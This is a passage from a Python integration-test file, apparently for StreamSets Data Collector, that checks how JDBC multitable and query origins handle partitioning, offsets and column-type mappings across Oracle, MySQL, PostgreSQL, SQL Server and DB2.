connection.execute(f"INSERT INTO {table_name} VALUES({m*100+s}, TIMESTAMP'2019-01-01 10:{m}:{s}-5:00')")
connection.execute("commit")
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = [row.items() for row in connection.execute(comparing_query)]
assert len(result) == 0
finally:
logger.info('Dropping table %s and %s in %s database ...', table_name, table_name_dest, database.type)
connection.execute(f"DROP TABLE {table_name}")
connection.execute(f"DROP TABLE {table_name_dest}")
def _get_date_from_days(d):
return datetime.date(1970, 1, 1) + datetime.timedelta(days=d)
@database('oracle')
def test_jdbc_multitable_oracle_split_by_date(sdc_builder, sdc_executor, database):
"""Make sure that we can properly partition DATE type.
More precisely, we want to run this pipeline:
multitable >> jdbc
multitable >= finisher
With more than one thread and using a DATE column as a offset column.
This feature was not available until version 3.11.0, and was detected and
solved in ESC-513.
"""
table_name = get_random_string(string.ascii_uppercase, 20)
table_name_dest = get_random_string(string.ascii_uppercase, 20)
connection = database.engine.connect()
comparing_query = f"""(
select * from {table_name}
minus
select * from {table_name_dest}
) union (
select * from {table_name_dest}
minus
select * from {table_name}
)"""
try:
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
ID number primary key,
DT date
)
""")
# Create destination table
connection.execute(f"""CREATE TABLE {table_name_dest} AS SELECT * FROM {table_name} WHERE 1=0""")
# Insert a few rows
for m in range(0, 5):
for s in range(0, 59):
identifier = 100 * m + s
connection.execute(
f"INSERT INTO {table_name} VALUES({identifier}, DATE'{_get_date_from_days(identifier)}')"
)
connection.execute("commit")
builder = sdc_builder.get_pipeline_builder()
origin = builder.add_stage('JDBC Multitable Consumer')
# Partition size is set to 259200000 which corresponds to 30 days in ms,
# since dates are translated to timestamps
origin.table_configs = [{
"tablePattern": f'%{table_name}%',
"overrideDefaultOffsetColumns": True,
"offsetColumns": ["DT"], # Should cause SDC < 3.11.0 to throw an UnsupportedOperationException
"enableNonIncremental": False,
"partitioningMode": "REQUIRED",
"partitionSize": "259200000", # 30 days = 30*24*60*60*1000 (259200000)ms
"maxNumActivePartitions": 2
}]
origin.number_of_threads = 2
origin.maximum_pool_size = 2
finisher = builder.add_stage('Pipeline Finisher Executor')
finisher.stage_record_preconditions = ['${record:eventType() == "no-more-data"}']
FIELD_MAPPINGS = [dict(field='/ID', columnName='ID'),
dict(field='/DT', columnName='DT')]
destination = builder.add_stage('JDBC Producer')
destination.set_attributes(default_operation='INSERT',
table_name=table_name_dest,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='STOP_PIPELINE')
origin >> destination
origin >= finisher
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = [row.items() for row in connection.execute(comparing_query)]
assert len(result) == 0
# Insert few more rows and validate the outcome again
for m in range(6, 8):
for s in range(0, 59):
identifier = 100 * m + s
connection.execute(
f"INSERT INTO {table_name} VALUES({identifier}, DATE'{_get_date_from_days(identifier)}')"
)
connection.execute("commit")
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = [row.items() for row in connection.execute(comparing_query)]
assert len(result) == 0
finally:
logger.info('Dropping table %s and %s in %s database ...', table_name, table_name_dest, database.type)
connection.execute(f"DROP TABLE {table_name}")
connection.execute(f"DROP TABLE {table_name_dest}")
@sdc_min_version('3.9.0')
@database('mysql')
def test_jdbc_multitable_consumer_origin_high_resolution_timestamp_offset(sdc_builder, sdc_executor, database):
"""
Check if Jdbc Multi-table Origin can retrieve any records from a table using as an offset a high resolution
timestamp of milliseconds order. It is checked that the records read have a timestamp greater than the timestamp
used as initial offset.
Pipeline looks like:
jdbc_multitable_consumer >> trash
"""
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = f'{src_table_prefix}_{get_random_string(string.ascii_lowercase, 20)}'
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{'tablePattern': f'%{src_table_prefix}%',
'overrideDefaultOffsetColumns': True,
'offsetColumns': ['added'],
'offsetColumnToInitialOffsetValue': [{
'key': 'added',
'value': '${time:extractNanosecondsFromString(' +
'"1996-12-02 00:00:00.020111000")}'
}]
}])
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
connection = database.engine.connect()
# Create table
logger.info('Creating table %s in %s database ...', table_name, database.type)
connection.execute(f"""
CREATE TABLE {table_name}(
id INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
name varchar(100) NOT NULL,
age INT UNSIGNED NOT NULL,
added TIMESTAMP(6) NOT NULL
)
""")
# Insert rows
logger.info('Adding four rows into %s database ...', database.type)
connection.execute(f'INSERT INTO {table_name} VALUES(1, "Charly", 14, "2005-02-08 14:00:00.100105002")')
connection.execute(f'INSERT INTO {table_name} VALUES(2, "Paco", 28, "1992-05-25 11:00:00.000201010")')
connection.execute(f'INSERT INTO {table_name} VALUES(3, "Eugenio", 21, "1996-12-01 23:00:00.020111")')
connection.execute(f'INSERT INTO {table_name} VALUES(4, "Romualdo", 19, "2000-06-15 18:30:00.10523121")')
try:
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
name_id_from_output = [(record.field['name'], record.field['id'])
for record in snapshot[jdbc_multitable_consumer].output]
assert len(name_id_from_output) == 2
assert name_id_from_output == [('Romualdo', 4), ('Charly', 1)]
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
connection.execute(f'DROP TABLE {table_name}')
@database
@sdc_min_version('3.0.0.0')
def test_jdbc_multitable_consumer_partitioned_large_offset_gaps(sdc_builder, sdc_executor, database):
"""
Ensure that the multi-table JDBC origin can handle large gaps between offset columns in partitioned mode
The destination is trash, and there is a finisher waiting for the no-more-data event
The pipeline will be started, and we will capture two snapshots (to ensure all expected rows are covered),
then assert those captured snapshot rows match the expected data.
This is a test for SDC-10053
"""
if database.type == 'Oracle':
pytest.skip("This test depends on proper case for column names that Oracle auto-uppers.")
src_table_prefix = get_random_string(string.ascii_lowercase, 6)
table_name = '{}_{}'.format(src_table_prefix, get_random_string(string.ascii_lowercase, 20))
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{
"tablePattern": f'{table_name}',
"enableNonIncremental": False,
"partitioningMode": "REQUIRED",
"partitionSize": "1000000",
"maxNumActivePartitions": -1
}])
trash = pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
finisher = pipeline_builder.add_stage("Pipeline Finisher Executor")
finisher.stage_record_preconditions = ['${record:eventType() == "no-more-data"}']
jdbc_multitable_consumer >= finisher
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding four rows into %s table, with a large gap in the primary keys ...', table_name)
connection = database.engine.connect()
rows_with_gap = ROWS_IN_DATABASE + [{'id': 5000000, 'name': 'Evil Jeff'}]
connection.execute(table.insert(), rows_with_gap)
connection.close()
sdc_executor.add_pipeline(pipeline)
# need to capture two batches, one for row IDs 1-3, and one for the last row after the large gap
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, batches=2, start_pipeline=True).snapshot
rows_from_snapshot = [(record.get_field_data('/name').value, record.get_field_data('/id').value)
for batch in snapshot.snapshot_batches
for record in batch.stage_outputs[jdbc_multitable_consumer.instance_name].output]
expected_data = [(row['name'], row['id']) for row in rows_with_gap]
logger.info('Actual %s expected %s', rows_from_snapshot, expected_data)
assert rows_from_snapshot == expected_data
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@sdc_min_version('3.0.0.0')
@database('mysql')
# https://dev.mysql.com/doc/refman/8.0/en/data-types.html
# We don't support BIT generally (the driver is doing funky 'random' mappings on certain versions)
@pytest.mark.parametrize('sql_type,insert_fragment,expected_type,expected_value', [
('TINYINT', '-128', 'SHORT', -128),
('TINYINT UNSIGNED', '255', 'SHORT', 255),
('SMALLINT', '-32768', 'SHORT', -32768),
('SMALLINT UNSIGNED', '65535', 'SHORT', -1), # Support for unsigned isn't entirely correct!
('MEDIUMINT', '-8388608', 'INTEGER', '-8388608'),
('MEDIUMINT UNSIGNED', '16777215', 'INTEGER', '16777215'),
('INT', '-2147483648', 'INTEGER', '-2147483648'),
('INT UNSIGNED', '4294967295', 'INTEGER', '-1'), # Support for unsigned isn't entirely correct!
('BIGINT', '-9223372036854775807', 'LONG', '-9223372036854775807'),
('BIGINT UNSIGNED', '18446744073709551615', 'LONG', '-1'), # Support for unsigned isn't entirely correct!
('DECIMAL(5, 2)', '5.20', 'DECIMAL', '5.20'),
('NUMERIC(5, 2)', '5.20', 'DECIMAL', '5.20'),
('FLOAT', '5.2', 'FLOAT', '5.2'),
('DOUBLE', '5.2', 'DOUBLE', '5.2'),
# ('BIT(8)',"b'01010101'", 'BYTE_ARRAY', 'VQ=='),
('DATE', "'2019-01-01'", 'DATE', 1546300800000),
('DATETIME', "'2019-01-01 5:00:00'", 'DATETIME', 1546318800000),
('TIMESTAMP', "'2019-01-01 5:00:00'", 'DATETIME', 1546318800000),
('TIME', "'5:00:00'", 'TIME', 18000000),
('YEAR', "'2019'", 'DATE', 1546300800000),
('CHAR(5)', "'Hello'", 'STRING', 'Hello'),
('VARCHAR(5)', "'Hello'", 'STRING', 'Hello'),
('BINARY(5)', "'Hello'", 'BYTE_ARRAY', 'SGVsbG8='),
('VARBINARY(5)', "'Hello'", 'BYTE_ARRAY', 'SGVsbG8='),
('BLOB', "'Hello'", 'BYTE_ARRAY', 'SGVsbG8='),
('TEXT', "'Hello'", 'STRING', 'Hello'),
("ENUM('a', 'b')", "'a'", 'STRING', 'a'),
("set('a', 'b')", "'a,b'", 'STRING', 'a,b'),
("POINT", "POINT(1, 1)", 'BYTE_ARRAY', 'AAAAAAEBAAAAAAAAAAAA8D8AAAAAAADwPw=='),
("LINESTRING", "LineString(Point(0,0), Point(10,10), Point(20,25), Point(50,60))", 'BYTE_ARRAY',
'AAAAAAECAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkQAAAAAAAACRAAAAAAAAANEAAAAAAAAA5QAAAAAAAAElAAAAAAAAATkA='),
("POLYGON",
"Polygon(LineString(Point(0,0),Point(10,0),Point(10,10),Point(0,10),Point(0,0)),LineString(Point(5,5),Point(7,5),Point(7,7),Point(5,7),Point(5,5)))",
'BYTE_ARRAY',
'AAAAAAEDAAAAAgAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJEAAAAAAAAAAAAAAAAAAACRAAAAAAAAAJEAAAAAAAAAAAAAAAAAAACRAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAUQAAAAAAAABRAAAAAAAAAHEAAAAAAAAAUQAAAAAAAABxAAAAAAAAAHEAAAAAAAAAUQAAAAAAAABxAAAAAAAAAFEAAAAAAAAAUQA=='),
("JSON", "'{\"a\":\"b\"}'", 'STRING', '{\"a\": \"b\"}'),
])
@pytest.mark.parametrize('use_table_origin', [True, False])
def test_jdbc_multitable_mysql_types(sdc_builder, sdc_executor, database, use_table_origin, sql_type, insert_fragment,
expected_type, expected_value):
"""Test all feasible Mysql types."""
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
try:
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
id int primary key,
data_column {sql_type} NULL
)
""")
# And insert a row with actual value
connection.execute(f"INSERT INTO {table_name} VALUES(1, {insert_fragment})")
# And a null
connection.execute(f"INSERT INTO {table_name} VALUES(2, NULL)")
builder = sdc_builder.get_pipeline_builder()
if use_table_origin:
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": f'%{table_name}%'}]
origin.on_unknown_type = 'CONVERT_TO_STRING'
else:
origin = builder.add_stage('JDBC Query Consumer')
origin.sql_query = 'SELECT * FROM {0}'.format(table_name)
origin.incremental_mode = False
origin.on_unknown_type = 'CONVERT_TO_STRING'
trash = builder.add_stage('Trash')
origin >> trash
pipeline = builder.build(f"MySQL Type {sql_type} with value {insert_fragment}").configure_for_environment(
database)
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
assert len(snapshot[origin].output) == 2
record = snapshot[origin].output[0]
null_record = snapshot[origin].output[1]
# Since we are controlling types, we want to check explicit values inside the record rather the the python
# wrappers.
# TLKT-177: Add ability for field to return raw value
assert record.field['data_column'].type == expected_type
assert null_record.field['data_column'].type == expected_type
assert record.field['data_column']._data['value'] == expected_value
assert null_record.field['data_column'] == None
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
@sdc_min_version('3.0.0.0')
@database('postgresql')
# https://www.postgresql.org/docs/11/datatype.html
# Not testing 'serial' family explicitly as that is just an alias
# Not supporting tsvector tsquery as that doesn't seem fit for us
# bit(n) is not supported
# xml is not supported
# domain types (as a category are not supported)
# pg_lsn not supported
@pytest.mark.parametrize('sql_type,insert_fragment,expected_type,expected_value', [
('smallint', '-32768', 'SHORT', -32768),
('integer', '2147483647', 'INTEGER', '2147483647'),
('bigint', '-9223372036854775808', 'LONG', '-9223372036854775808'),
('decimal(5,2)', '5.20', 'DECIMAL', '5.20'),
('numeric(5,2)', '5.20', 'DECIMAL', '5.20'),
('real', '5.20', 'FLOAT', '5.2'),
('double precision', '5.20', 'DOUBLE', '5.2'),
('money', '12.34', 'DOUBLE', '12.34'),
('char(5)', "'Hello'", 'STRING', 'Hello'),
('varchar(5)', "'Hello'", 'STRING', 'Hello'),
('text', "'Hello'", 'STRING', 'Hello'),
('bytea', "'\\xDEADBEEF'", 'BYTE_ARRAY', '3q2+7w=='),
('timestamp', "'2003-04-12 04:05:06'", 'DATETIME', 1050120306000),
('timestamp with time zone', "'2003-04-12 04:05:06 America/New_York'", 'DATETIME', 1050134706000),
# For PostgreSQL, we don't create ZONED_DATETIME
('date', "'2019-01-01'", 'DATE', 1546300800000),
('time', "'5:00:00'", 'TIME', 18000000),
('time with time zone', "'04:05:06-08:00'", 'TIME', 43506000),
('interval', "INTERVAL '1' YEAR", 'STRING', '1 years 0 mons 0 days 0 hours 0 mins 0.00 secs'),
('boolean', "true", 'BOOLEAN', True),
('ai', "'sad'", 'STRING', 'sad'),
('point', "'(1, 1)'", 'STRING', '(1.0,1.0)'),
('line', "'{1, 1, 1}'", 'STRING', '{1.0,1.0,1.0}'),
('lseg', "'((1,1)(2,2))'", 'STRING', '[(1.0,1.0),(2.0,2.0)]'),
('box', "'(1,1)(2,2)'", 'STRING', '(2.0,2.0),(1.0,1.0)'),
('path', "'((1,1),(2,2))'", 'STRING', '((1.0,1.0),(2.0,2.0))'),
('polygon', "'((1,1),(2,2))'", 'STRING', '((1.0,1.0),(2.0,2.0))'),
('circle', "'<(1,1),5>'", 'STRING', '<(1.0,1.0),5.0>'),
('inet', "'127.0.0.1/16'", 'STRING', '127.0.0.1/16'),
('cidr', "'127.0.0.0/16'", 'STRING', '127.0.0.0/16'),
('macaddr', "'08:00:2b:01:02:03'", 'STRING', '08:00:2b:01:02:03'),
# ('macaddr8', "'08:00:2b:01:02:03'", 'STRING', '08:00:2b:ff:fe:01:02:03'),
# ('bit(8)', "b'10101010'", 'BYTE_ARRAY', '08:00:2b:ff:fe:01:02:03'), # Doesn't work at all today
('bit varying(3)', "b'101'", 'STRING', '101'),
('uuid', "'a0eebc99-9c0b-4ef8-bb6d-6bb9bd380a11'", 'STRING', 'a0eebc99-9c0b-4ef8-bb6d-6bb9bd380a11'),
# ('xml', "'<foo>bar</foo>'", 'STRING', ''), # Doesn't work properly today
("json", "'{\"a\":\"b\"}'", 'STRING', '{"a":"b"}'),
("jsonb", "'{\"a\":\"b\"}'", 'STRING', '{"a": "b"}'),
("integer[3][3]", "'{{1,2,3},{4,5,6},{7,8,9}}'", 'STRING', '{{1,2,3},{4,5,6},{7,8,9}}'),
("ct", "ROW(1, 2)", 'STRING', '(1,2)'),
("int4range", "'[1,2)'", 'STRING', '[1,2)'),
("int8range", "'[1,2)'", 'STRING', '[1,2)'),
("numrange", "'[1,2)'", 'STRING', '[1,2)'),
("tsrange", "'[2010-01-01 14:30, 2010-01-01 15:30)'", 'STRING', '["2010-01-01 14:30:00","2010-01-01 15:30:00")'),
("tstzrange", "'[2010-01-01 14:30 America/New_York, 2010-01-01 15:30 America/New_York)'", 'STRING',
'["2010-01-01 19:30:00+00","2010-01-01 20:30:00+00")'),
("daterange", "'[2010-01-01, 2010-01-02)'", 'STRING', '[2010-01-01,2010-01-02)'),
])
@pytest.mark.parametrize('use_table_origin', [True, False])
def test_jdbc_postgresql_types(sdc_builder, sdc_executor, database, use_table_origin, sql_type, insert_fragment,
expected_type, expected_value):
"""Test all feasible PostgreSQL types."""
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
try:
# Create enum type conditionally
connection.execute(f"""
DO
$$
BEGIN
IF NOT EXISTS (SELECT * FROM pg_type typ
INNER JOIN pg_namespace nsp ON nsp.oid = typ.typnamespace
WHERE nsp.nspname = current_schema() AND typ.typname = 'ai') THEN
CREATE TYPE ai AS ENUM ('sad', 'ok', 'happy');
END IF;
END;
$$
LANGUAGE plpgsql;
""")
# Create enum complex type conditionally
connection.execute(f"""
DO
$$
BEGIN
IF NOT EXISTS (SELECT * FROM pg_type typ
INNER JOIN pg_namespace nsp ON nsp.oid = typ.typnamespace
WHERE nsp.nspname = current_schema() AND typ.typname = 'ct') THEN
CREATE TYPE ct AS (a int, b int);
END IF;
END;
$$
LANGUAGE plpgsql;
""")
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
id int primary key,
data_column {sql_type} NULL
)
""")
# And insert a row with actual value
connection.execute(f"INSERT INTO {table_name} VALUES(1, {insert_fragment})")
# And a null
connection.execute(f"INSERT INTO {table_name} VALUES(2, NULL)")
builder = sdc_builder.get_pipeline_builder()
if use_table_origin:
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": f'%{table_name}%'}]
origin.on_unknown_type = 'CONVERT_TO_STRING'
else:
origin = builder.add_stage('JDBC Query Consumer')
origin.sql_query = 'SELECT * FROM {0}'.format(table_name)
origin.incremental_mode = False
origin.on_unknown_type = 'CONVERT_TO_STRING'
trash = builder.add_stage('Trash')
origin >> trash
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
assert len(snapshot[origin].output) == 2
record = snapshot[origin].output[0]
null_record = snapshot[origin].output[1]
# Since we are controlling types, we want to check explicit values inside the record rather the the python
# wrappers.
# TLKT-177: Add ability for field to return raw value
assert record.field['data_column'].type == expected_type
assert null_record.field['data_column'].type == expected_type
assert record.field['data_column']._data['value'] == expected_value
assert null_record.field['data_column'] == None
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
@sdc_min_version('3.0.0.0')
@database('sqlserver')
# https://docs.microsoft.com/en-us/sql/t-sql/data-types/data-types-transact-sql?view=sql-server-2017
# hiearchyid types not supported
# Geometry and geography not supported
@pytest.mark.parametrize('sql_type,insert_fragment,expected_type,expected_value', [
('DATE', "'2019-01-01'", 'DATE', 1546300800000),
('DATETIME', "'2004-05-23T14:25:10'", 'DATETIME', 1085322310000),
('DATETIME2', "'2004-05-23T14:25:10'", 'DATETIME', 1085322310000),
('DATETIMEOFFSET', "'2004-05-23 14:25:10.3456 -08:00'", 'DEPENDS_ON_VERSION', 'depends_on_version'),
('SMALLDATETIME', "'2004-05-23T14:25:10'", 'DATETIME', 1085322300000),
('TIME', "'14:25:10'", 'TIME', 51910000),
('BIT', "1", 'BOOLEAN', True),
('DECIMAL(5,2)', '5.20', 'DECIMAL', '5.20'),
('NUMERIC(5,2)', '5.20', 'DECIMAL', '5.20'),
('REAL', '5.20', 'FLOAT', '5.2'),
('FLOAT', '5.20', 'DOUBLE', '5.2'),
('TINYINT', '255', 'SHORT', 255),
('SMALLINT', '-32768', 'SHORT', -32768),
('INT', '-2147483648', 'INTEGER', '-2147483648'),
('BIGINT', '-9223372036854775807', 'LONG', '-9223372036854775807'),
('MONEY', '255.60', 'DECIMAL', '255.6000'),
('SMALLMONEY', '255.60', 'DECIMAL', '255.6000'),
('BINARY(5)', "CAST('Hello' AS BINARY(5))", 'BYTE_ARRAY', 'SGVsbG8='),
('VARBINARY(5)', "CAST('Hello' AS VARBINARY(5))", 'BYTE_ARRAY', 'SGVsbG8='),
('CHAR(5)', "'Hello'", 'STRING', 'Hello'),
('VARCHAR(5)', "'Hello'", 'STRING', 'Hello'),
('NCHAR(5)', "'Hello'", 'STRING', 'Hello'),
('NVARCHAR(5)', "'Hello'", 'STRING', 'Hello'),
('TEXT', "'Hello'", 'STRING', 'Hello'),
('NTEXT', "'Hello'", 'STRING', 'Hello'),
('IMAGE', "CAST('Hello' AS IMAGE)", 'BYTE_ARRAY', 'SGVsbG8='),
# ('GEOGRAPHY',"geography::STGeomFromText('LINESTRING(-122.360 47.656, -122.343 47.656 )', 4326)", 'BYTE_ARRAY', '5hAAAAEUhxbZzvfTR0DXo3A9CpdewIcW2c7300dAy6FFtvOVXsA='),
# ('GEOMETRY',"geometry::STGeomFromText('LINESTRING (100 100, 20 180, 180 180)', 0)", 'BYTE_ARRAY', 'AAAAAAEEAwAAAAAAAAAAAFlAAAAAAAAAWUAAAAAAAAA0QAAAAAAAgGZAAAAAAACAZkAAAAAAAIBmQAEAAAABAAAAAAEAAAD/////AAAAAAI='),
('XML', "'<a></a>'", 'STRING', '<a/>')
])
@pytest.mark.parametrize('use_table_origin', [True, False])
def test_jdbc_sqlserver_types(sdc_builder, sdc_executor, database, use_table_origin, sql_type, insert_fragment,
expected_type, expected_value):
"""Test all feasible SQL Server types."""
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
try:
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
id int primary key,
data_column {sql_type} NULL
)
""")
# And insert a row with actual value
connection.execute(f"INSERT INTO {table_name} VALUES(1, {insert_fragment})")
# And a null
connection.execute(f"INSERT INTO {table_name} VALUES(2, NULL)")
builder = sdc_builder.get_pipeline_builder()
if use_table_origin:
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": f'%{table_name}%'}]
else:
origin = builder.add_stage('JDBC Query Consumer')
origin.sql_query = 'SELECT * FROM {0}'.format(table_name)
origin.incremental_mode = False
trash = builder.add_stage('Trash')
# As a part of SDC-10125, DATETIMEOFFSET is natively supported in SDC, and is converted into ZONED_DATETIME
if sql_type == 'DATETIMEOFFSET':
if Version(sdc_builder.version) >= Version('3.14.0'):
expected_type = 'ZONED_DATETIME'
expected_value = '2004-05-23T14:25:10.3456-08:00'
else:
expected_type = 'STRING'
expected_value = '2004-05-23 14:25:10.3456 -08:00'
# This unknown_type_action setting is required, otherwise DATETIMEOFFSET tests for SDC < 3.14 will fail.
origin.on_unknown_type = 'CONVERT_TO_STRING'
origin >> trash
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
assert len(snapshot[origin].output) == 2
record = snapshot[origin].output[0]
null_record = snapshot[origin].output[1]
# Since we are controlling types, we want to check explicit values inside the record rather the the python
# wrappers.
# TLKT-177: Add ability for field to return raw value
assert record.field['data_column'].type == expected_type
assert null_record.field['data_column'].type == expected_type
assert record.field['data_column']._data['value'] == expected_value
assert null_record.field['data_column'] == None
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
@sdc_min_version('3.12.0')
@database('sqlserver')
@pytest.mark.parametrize('on_unknown_type_action', ['CONVERT_TO_STRING', 'STOP_PIPELINE'])
def test_jdbc_sqlserver_on_unknown_type_action(sdc_builder, sdc_executor, database, on_unknown_type_action):
"""Test JDBC Multitable Consumer with MS-SQL server for the on_unknown_type action.
This is to verify SDC-12764.
When the 'On Unknown Type' action is set to STOP_PIPELINE,the pipeline should stop with a StageException Error since it cannot convert DATETIMEOFFSET field
When the 'On Unknown Type' action is set to CONVERT_TO_STRING, the pipeline should convert the unknown type to string and process next record
The pipeline will look like:
JDBC_Multitable_Consumer >> trash
"""
if Version(sdc_builder.version) >= Version('3.14.0'):
pytest.skip("Skipping SQLServer Unknown Type action check, since DATETIMEOFFSET field is now natively supported from SDC Version 3.14.0")
column_type = 'DATETIMEOFFSET'
INPUT_DATE = "'2004-05-23T14:25:10'"
EXPECTED_OUTCOME = OrderedDict(id=1, date_offset='2004-05-23 14:25:10 +00:00')
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
pipeline_builder = sdc_builder.get_pipeline_builder()
# Setup Origin with specified unknown type action
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{"tablePattern": f'%{table_name}%'}],
on_unknown_type=on_unknown_type_action)
# Setup destination
trash=pipeline_builder.add_stage('Trash')
# Connect the pipeline stages
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
# Create table and add a row
connection.execute(f"""
CREATE TABLE {table_name}(
id int primary key,
date_offset {column_type} NOT NULL
)
""")
connection.execute(f"INSERT INTO {table_name} VALUES(1, {INPUT_DATE})")
try:
if on_unknown_type_action == 'STOP_PIPELINE':
# Pipeline should stop with StageException
with pytest.raises(Exception):
sdc_executor.start_pipeline(pipeline)
sdc_executor.stop_pipeline(pipeline)
status = sdc_executor.get_pipeline_status(pipeline).response.json().get('status')
assert 'RUN_ERROR' == status
else:
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
output_records = snapshot[jdbc_multitable_consumer].output
assert len(output_records) == 1
assert output_records[0].field == EXPECTED_OUTCOME
finally:
status = sdc_executor.get_pipeline_status(pipeline).response.json().get('status')
if status == 'RUNNING':
sdc_executor.stop_pipeline(pipeline)
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
@sdc_min_version('3.14.0')
@database('sqlserver')
def test_jdbc_sqlserver_datetimeoffset_as_primary_key(sdc_builder, sdc_executor, database):
"""Test JDBC Multitable Consumer with SQLServer table configured with DATETIMEOFFSET column as primary key.
The pipeline will look like:
JDBC_Multitable_Consumer >> trash
"""
INPUT_COLUMN_TYPE, INPUT_DATE = 'DATETIMEOFFSET', "'2004-05-23 14:25:10.3456 -08:00'"
EXPECTED_TYPE, EXPECTED_VALUE = 'ZONED_DATETIME', '2004-05-23T14:25:10.3456-08:00'
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
pipeline_builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = pipeline_builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.set_attributes(table_configs=[{"tablePattern": f'%{table_name}%'}])
trash=pipeline_builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
connection.execute(f"""
CREATE TABLE {table_name}(
dto {INPUT_COLUMN_TYPE} NOT NULL PRIMARY KEY
)
""")
connection.execute(f"INSERT INTO {table_name} VALUES({INPUT_DATE})")
try:
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
assert len(snapshot[jdbc_multitable_consumer].output) == 1
record = snapshot[jdbc_multitable_consumer].output[0]
assert record.field['dto'].type == EXPECTED_TYPE
assert record.field['dto'].value == EXPECTED_VALUE
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
# Test for SDC-13288
@database('db2')
def test_jdbc_producer_db2_long_record(sdc_builder, sdc_executor, database):
"""Test that JDBC Producer correctly sends record when setting Custom Data SQLSTATE for db2 database instead of
throwing StageException. The pipelines reads a file with 5 records 1 by 1 having the last record being biggest
than the db2 table column size. That throws an error with an specific SQL Code (22001). Having that code in Custom
Data SQLSTATE sends the last record to error.
The pipeline looks like:
directory_origin >> jdbc_producer
In order to create the file read by directory origin another pipeline is used that looks like:
dev_raw_data_source >> local_fs
"""
# Insert data into file.
tmp_directory = os.path.join(tempfile.gettempdir(), get_random_string(string.ascii_letters, 10))
csv_records = ['1,hello', '2,hello', '3,hello', '4,hello', '5,hellolargerword']
_setup_delimited_file(sdc_executor, tmp_directory, csv_records)
# Create directory origin.
pipeline_builder = sdc_builder.get_pipeline_builder()
directory = pipeline_builder.add_stage('Directory', type='origin')
directory.set_attributes(data_format='DELIMITED',
file_name_pattern='sdc*', file_name_pattern_mode='GLOB',
file_post_processing='DELETE', files_directory=tmp_directory,
batch_size_in_recs=1)
# Create jdbc producer destination.
# Create table. db2 internal sets table name in uppercase. Thus using directly ascii uppercase.
table_name = get_random_string(string.ascii_uppercase, 20)
